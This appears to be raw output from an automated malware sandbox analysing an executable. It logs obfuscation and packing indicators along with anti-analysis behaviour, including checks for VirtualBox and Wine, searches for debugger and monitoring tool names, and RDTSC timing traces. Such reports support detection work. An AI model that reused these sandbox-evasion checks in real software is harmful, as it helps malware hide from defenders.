Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: file.exe Static file information: File size 4490752 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283a00
Source: file.exe Static PE information: Raw size of dkqxmldn is bigger than: 0x100000 < 0x1c1000

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x44a3f0 should be: 0x44d94c
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: dkqxmldn
Source: file.exe Static PE information: section name: ajwrokqy
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0172E691 push edx; ret 0_3_0172E692
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B41D0 push eax; mov dword ptr [esp], edx 0_2_008B41D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B2340 push eax; mov dword ptr [esp], 00000000h 0_2_005B2343
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EC7F0 push eax; mov dword ptr [esp], 00000000h 0_2_005EC743
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00570AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00570AC4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00591430 push eax; mov dword ptr [esp], 00000000h 0_2_00591433
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B39A0 push eax; mov dword ptr [esp], 00000000h 0_2_005B39A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0058DAD0 push eax; mov dword ptr [esp], edx 0_2_0058DAD1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B9F40 push dword ptr [eax+04h]; ret 0_2_008B9F6F
Source: file.exe Static PE information: section name: dkqxmldn entropy: 7.95546200906979

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFA5A second address: BDFA70 instructions: 0x00000000 rdtsc 0x00000002 js 00007F70F070E5C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jbe 00007F70F070E5CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D41B second address: D3D45C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB16h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F70F0BCDB1Eh 0x00000014 jmp 00007F70F0BCDB18h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D45C second address: D3D462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D462 second address: D3D468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D468 second address: D3D474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3D474 second address: D3D47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BFCB second address: D5BFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BFD1 second address: D5BFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BFD7 second address: D5BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BFF5 second address: D5BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BFFB second address: D5BFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DB21 second address: D5DB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DB26 second address: D5DB79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F70F070E5CCh 0x00000013 or dword ptr [ebp+122D3919h], esi 0x00000019 push 00000000h 0x0000001b call 00007F70F070E5CBh 0x00000020 jmp 00007F70F070E5D7h 0x00000025 pop edx 0x00000026 call 00007F70F070E5C9h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jno 00007F70F070E5C6h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DB79 second address: D5DB7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DB7F second address: D5DBC2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F70F070E5D8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F70F070E5C8h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F70F070E5CBh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DBC2 second address: D5DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DBC6 second address: D5DBEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DBEC second address: D5DBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DBF0 second address: D5DC0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DD6D second address: D5DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jns 00007F70F0BCDB06h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e jp 00007F70F0BCDB17h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add dword ptr [ebp+122D1BD1h], ecx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2DDDh] 0x0000003d push 2269675Ah 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DDCC second address: D5DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DDD1 second address: D5DE16 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F0BCDB08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 226967DAh 0x00000011 or cx, D939h 0x00000016 push 00000003h 0x00000018 mov ecx, dword ptr [ebp+122D2E15h] 0x0000001e push 00000000h 0x00000020 jo 00007F70F0BCDB0Ch 0x00000026 mov dword ptr [ebp+122D1C38h], esi 0x0000002c push 00000003h 0x0000002e add dword ptr [ebp+122D2366h], ebx 0x00000034 call 00007F70F0BCDB09h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE16 second address: D5DE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE1A second address: D5DE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE33 second address: D5DE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE3D second address: D5DE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE41 second address: D5DE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F70F070E5C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE53 second address: D5DE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DF36 second address: D5DF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jc 00007F70F070E5D0h 0x0000000d jmp 00007F70F070E5CAh 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D2ACDh] 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2156h], esi 0x00000021 push EDE259D0h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DF66 second address: D5DFE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e add dword ptr [esp], 121DA6B0h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jmp 00007F70F0BCDB0Eh 0x00000034 mov cx, ax 0x00000037 push 00000003h 0x00000039 mov di, 9810h 0x0000003d push 00000000h 0x0000003f adc di, 6A9Ah 0x00000044 push 00000003h 0x00000046 jmp 00007F70F0BCDB0Eh 0x0000004b call 00007F70F0BCDB09h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F70F0BCDB06h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DFE2 second address: D5E029 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F70F070E5D9h 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F070E5D6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5E029 second address: D5E056 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F70F0BCDB06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F70F0BCDB16h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8056D second address: D80573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80573 second address: D80586 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 je 00007F70F0BCDB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB6B second address: D7EB7D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7EB7D second address: D7EB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F4E6 second address: D7F4F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72A36 second address: D72A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 pop ebx 0x0000000a jng 00007F70F0BCDB0Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 jnc 00007F70F0BCDB06h 0x0000001b pop edx 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D564FF second address: D56509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56509 second address: D5650D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5650D second address: D56513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F7B2 second address: D7F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007F70F0BCDB06h 0x0000000f jg 00007F70F0BCDB06h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7F7C8 second address: D7F7CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7FD41 second address: D7FD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7FFCC second address: D7FFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80134 second address: D80138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80138 second address: D8015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8015A second address: D8015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80420 second address: D80431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5CBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D80431 second address: D80435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87EEE second address: D87EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86F7A second address: D86F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnl 00007F70F0BCDB06h 0x00000011 jnl 00007F70F0BCDB06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F70F0BCDB0Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CF7E second address: D8CFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pushad 0x00000008 jmp 00007F70F070E5D2h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CFA6 second address: D8CFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CFB2 second address: D8CFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CFB6 second address: D8CFBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
